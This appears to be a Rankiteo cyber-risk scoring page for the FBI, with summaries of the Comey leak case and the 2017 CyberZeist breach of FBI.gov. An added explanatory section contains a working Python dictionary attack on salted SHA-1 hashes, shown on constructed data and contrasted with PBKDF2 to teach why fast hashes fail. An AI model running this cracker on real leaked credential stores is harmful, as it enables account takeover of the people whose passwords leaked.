The FBI faced a high-profile breach involving unauthorized leaks of sensitive information tied to its investigation into Hillary Clinton’s private email server. Former FBI Director James Comey was indicted for allegedly authorizing Daniel Richman, a Columbia University law professor and former federal prosecutor, to act as an anonymous media source. The leak, investigated under Operation Arctic Haze, involved classified details appearing in a 2017 New York Times article, though no charges were filed against Richman or Comey for the leak itself. The incident stemmed from Comey’s 2020 Senate testimony, where he denied authorizing any FBI personnel to leak investigation details—contradicted by later revelations. While no direct data theft or financial loss occurred, the breach compromised the FBI’s operational integrity, eroded public trust, and triggered legal repercussions for Comey, including charges of false statements and obstruction. The case also highlighted political interference allegations, with Comey’s legal team arguing the prosecution was motivated by former President Trump’s personal vendetta. The reputational damage extended to the FBI’s credibility in handling politically sensitive investigations, reinforcing perceptions of institutional vulnerability to internal leaks and external manipulation.
INCIDENT DETAILS -
TYPE
Unauthorized Disclosure, Insider Threat, Alleged Perjury
MOTIVATION
Political Influence, Media Narrative Control; Disputed: Personal Vendetta (per Comey's defense)
IMPACT
Data Involved: classified FBI investigation details (alleged); internal FBI communications (memos). Effects: FBI credibility undermined; internal trust erosion; rated High (FBI & DOJ); politicization of law enforcement; perjury charges (Comey); obstruction of Congress (Comey)
DATA BREACH
Type Of Data Compromised: classified investigation details (alleged); internal FBI memos (Trump conversations); investigation notes. Sensitivity Of Data: High (Classified/Confidential). Disclosure Channel: media leaks (New York Times, Wall Street Journal). Format: text (memos)
JANUARY 2017
Score before incident: 797
Data Leak | 01 Jan 2017 | FBI
FBI Website Data Breach by CyberZeist
Score after incident: 736 (HIGH, impact -61). Record ID: FED328131123
The black hat hacker CyberZeist gained access to the FBI website FBI.gov and exposed data from it on Pastebin. The leaked files contain account information: names, email addresses, SHA-1 password hashes, and the salts used with them (the original report calls these "SHA1 encrypted passwords"; SHA-1 is a hash function, not encryption, and a leaked hash together with its salt can be attacked offline). While FBI staff worked to resolve the issue, CyberZeist published further details of the attack. The website administrators appear to have made some unfortunate mistakes; for instance, backup files were left on the same server, where the hacker was able to reach them, even though he chose not to publish them right away.
INCIDENT DETAILS -
TYPE
Data Breach
IMPACT
Names, SHA-1 password hashes, SHA-1 salts, email addresses
DATA BREACH
Type Of Data Compromised: personal information, credentials. Sensitivity Of Data: High. Password Hashing: salted SHA-1 (not encryption)
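The point to take from the CyberZeist entry is that leaking a password hash together with its salt hands an attacker everything needed to guess passwords offline: the salt still defeats precomputed tables, but each guess costs a single SHA-1, which runs at billions of guesses per second on one modern GPU. The following is an added example, not code from the page, the FBI, or the CMS involved; the records, salts, passwords and wordlist are constructed, and the hash layout (SHA-1 over salt followed by password, hex encoded) is an assumption, since the page does not say how fbi.gov stored them.

```python
"""Offline dictionary attack on leaked salted SHA-1 password hashes, and the
slow KDF a password store should have used instead.

Added example with constructed data. The salt||password layout is an
assumption; the page does not describe the real storage format."""
import hashlib
import hmac


def salted_sha1(password: str, salt: str) -> str:
    """Hex SHA-1 of salt||password (assumed layout of the leaked records)."""
    return hashlib.sha1((salt + password).encode("utf-8")).hexdigest()


def make_leak():
    """Constructed stand-in for the leaked records: (email, salt, hex hash)."""
    users = [
        ("analyst@example.gov", "k3Pq", "Summer2016!"),
        ("webmaster@example.gov", "Zx9a", "fbi2017"),
        ("director@example.gov", "Qm41", "c0rrect-horse-battery-staple"),
    ]
    return [(email, salt, salted_sha1(pw, salt)) for email, salt, pw in users]


# Constructed wordlist; real attacks use leaked-password corpora and rule sets.
WORDLIST = ["password", "123456", "Summer2016!", "fbi2017", "letmein", "qwerty"]


def crack(records, wordlist):
    """Return {email: password} for every record whose password is in the wordlist.

    The salt is public to the attacker, so each guess costs exactly one SHA-1.
    Per-user salts only force the wordlist to be re-hashed per user; they do not
    slow any individual guess down."""
    cracked = {}
    for email, salt, digest in records:
        for guess in wordlist:
            if hmac.compare_digest(salted_sha1(guess, salt), digest):
                cracked[email] = guess
                break
    return cracked


def pbkdf2_hex(password: str, salt: str, iterations: int = 600_000) -> str:
    """What the store should do instead: an iterated KDF that makes each guess
    cost hundreds of thousands of hash operations rather than one."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                               salt.encode("utf-8"), iterations).hex()


if __name__ == "__main__":
    leak = make_leak()
    found = crack(leak, WORDLIST)
    for email, _, _ in leak:
        print(f"{email}: {found.get(email, '<not in wordlist>')}")
```

Two of the three constructed accounts fall to a six-word list; only the long passphrase survives, and it survives because of its length, not because of the salt. Swapping salted_sha1 for pbkdf2_hex (or bcrypt, scrypt or Argon2) would make the same wordlist run take roughly 600,000 times as long per guess, which is the property a leaked hash store actually needs.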

Frequently Asked Questions

- What is the current A.I Rankiteo Cyber Score for FBI?
- What was FBI's A.I Rankiteo Cyber Score in May 2026?
- What was FBI's A.I Rankiteo Cyber Score in April 2026?
- What was FBI's A.I Rankiteo Cyber Score in March 2026?
- What was FBI's A.I Rankiteo Cyber Score in February 2026?
- What was FBI's A.I Rankiteo Cyber Score in January 2026?
- What was FBI's A.I Rankiteo Cyber Score in December 2025?
- What was FBI's A.I Rankiteo Cyber Score in November 2025?
- What was FBI's A.I Rankiteo Cyber Score in October 2025?
- What was FBI's A.I Rankiteo Cyber Score in September 2025?
- What was FBI's A.I Rankiteo Cyber Score in August 2025?
- What was FBI's A.I Rankiteo Cyber Score in July 2025?
- What is the average per-incident point impact on FBI's A.I Rankiteo Cyber Score over the past 12 months?
- Where can I access detailed records of all cyber incidents associated with FBI?
- Where can I find a summary of the A.I Rankiteo Risk Scoring methodology?
- Where can I view FBI's profile page on Rankiteo?
- How accurate is the A.I Rankiteo Risk Scoring methodology?
Federal Bureau of Investigation (FBI) Cyber Scoring History | Rankiteo